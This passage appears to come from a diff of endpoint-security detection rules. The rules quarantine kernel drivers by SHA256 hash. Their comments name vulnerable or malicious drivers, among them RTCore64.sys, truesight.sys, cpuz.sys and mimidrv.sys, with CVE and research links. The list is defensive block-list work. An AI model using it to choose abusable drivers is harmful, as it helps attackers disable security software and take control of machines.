"2026-03-23T11:45:30.815785Z", + "creation_date": "2026-03-23T11:45:30.815787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17942865680bd3d6e6633c90cc4bd692ae0951a8589dbe103c1e293b3067344d", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"0dd17a6f-ac8c-50b8-b91a-95255e0eb552", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472433Z", + "creation_date": "2026-03-23T11:45:30.472436Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e51ec2876af3c9c3f1563987a9a35a10f091ea25ede16b1a34ba2648c53e9dfc", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ddb945b-8a83-5c19-a6e8-2fcc0b6cd4be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971802Z", + "creation_date": "2026-03-23T11:45:29.971804Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971810Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23ab90e1990b4c5250f7bacbc7ff90e989583a2ccacf4ba333255f1d385d0ad8", + "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0dde037c-0457-5836-a6be-ec538971fcff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820567Z", + "creation_date": "2026-03-23T11:45:31.820569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a34ccbaf4dfd2dd8c97d5d346abf177e7b1a5d97d462053eae75bc53f48b949b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ddf9429-89f6-57e3-b49c-dbe3f4711d32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607012Z", + "creation_date": "2026-03-23T11:45:29.607014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607019Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19d579e5a08bcb524405bdcbd2ea7247548af9f23ce64582a5be5ae3f184ad23", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0de38a08-7c51-5dfe-afc0-72ab6e44b7f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456624Z", + "creation_date": "2026-03-23T11:45:30.456627Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"507724d96a54f3e45c16a065bf38ae82a9b80d07096a461068a701cae0c1cf29", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0de8afcf-6164-5207-972e-316b527d0aca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820685Z", + "creation_date": "2026-03-23T11:45:30.820687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07d0090c76155318e78a676e2f8af1500c20aaa1e84f047c674d5f990f5a09c8", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0de8dc3b-7182-5698-a360-0dd92ddb48d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985612Z", + "creation_date": "2026-03-23T11:45:29.985614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92f9d73cec5ab3352c4b3cbf4574d13b2e506cba24cc74580e19e941063eaf7d", + "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://ioctl.fail/echo-ac-writeup/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0df226fe-4357-5400-b1c3-18658b719d53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481358Z", + "creation_date": "2026-03-23T11:45:31.481362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eba7f6ae36e0aaa7ade176acf1af218739dbf6c6a25a56e6b5ced1567a3f6db5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "0df3d649-ac45-5a8c-8ce2-f59b43232a69", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495310Z", + "creation_date": "2026-03-23T11:45:31.495313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03eb25b9ffd3d58bb6f6c29d38697839ca871dfa211e42dddb19c6a84ec395f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0df92180-5030-59d9-8fda-83d0caeca6f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610563Z", + "creation_date": "2026-03-23T11:45:29.610565Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8688e43d94b41eeca2ed458b8fc0d02f74696a918e375ecd3842d8627e7a8f2b", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0df9b8a5-4ddb-53ac-9b47-ec96b018b630", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826281Z", + "creation_date": "2026-03-23T11:45:30.826283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4876c029a6c88d98090beabfd5f6e1e5186824280224dc5178ad07427d737d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e04109e-55bb-5a15-aadb-805874a76252", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151108Z", + "creation_date": "2026-03-23T11:45:31.151110Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "99d42356eba7c7b6ee35797ee093d629649bd73dab14944f59ca89f354053c8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e1ee81a-59b9-5759-b6dc-29932b4396f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606386Z", + "creation_date": "2026-03-23T11:45:29.606388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "6222ed7d921b84e4ffcfa6638861348033191a3cc350547f7dcfb8927040f0a4", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e3c2ad0-8fd5-58f1-bc1d-8af917413301", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477391Z", + "creation_date": "2026-03-23T11:45:30.477395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477414Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98ec7cc994d26699f5d26103a0aeb361128cff3c2c4d624fc99126540e23e97e", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e40e719-43f6-5139-9eea-7d3e975cbc0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606060Z", + "creation_date": "2026-03-23T11:45:29.606062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606068Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ff39728f1c11d1108f65ec5eb3d722fd1a1279c530d79712e0d32b34880baaa", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e41b11a-7f28-55f4-af45-6f7eaa96ab8d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824886Z", + "creation_date": "2026-03-23T11:45:30.824890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "178238d8a0b3e642aaafc2217cac9c9277420b2ef2b16302d10b7952b8054799", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e41fa7f-745a-5eaf-8a82-37c3b507223c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481658Z", + "creation_date": "2026-03-23T11:45:30.481660Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481666Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42b528fdde50a21afed0cbdc07a6cb9d22d421eb0228d4782f18d22a83873223", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e47cb8c-109e-5b59-bfae-ff4fd123196c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497707Z", + "creation_date": "2026-03-23T11:45:31.497709Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497715Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91808676497a3475557879cb44eda3e252f5170385e37c476629652324b9a512", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e4f2091-7067-5399-a99a-0a5443a242f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465985Z", + "creation_date": "2026-03-23T11:45:30.465988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465998Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0740359baef32cbb0b14a9d1bd3499ea2e770ff9b1c85898cfac8fd9aca4fa39", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e50c0b4-20e2-59d7-972f-12543adfa566", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828401Z", + "creation_date": "2026-03-23T11:45:30.828403Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828409Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9e21c38488850dada38cc727028ed84d56192003eac34ed12f59a389d30a3fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e541cd8-42be-5369-a6cf-bbc721b0f5a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813088Z", + "creation_date": "2026-03-23T11:45:31.813091Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813100Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91d8852011e6fc1a8ef8221a02357ce09f073d667d8eab9af269c5e22e7b1386", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e646631-85aa-54bf-87ae-4ccab2e177ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142220Z", + "creation_date": "2026-03-23T11:45:31.142222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "624ccf6b462b82f89a8736f3269b57114ddaf714f809736c9962db06a17b6ce3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e6a6826-16d4-5870-9dfc-6aa6a1c7eda4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607346Z", + "creation_date": "2026-03-23T11:45:29.607348Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607353Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df0cc4e5c9802f8edaefeb130e375cad56b2c5490d8ebd77d8dbdcc6fdc7ecb6", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0e6d7ecc-6ae1-5154-822e-04c4442a1fa3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808742Z", + "creation_date": "2026-03-23T11:45:31.808745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808750Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
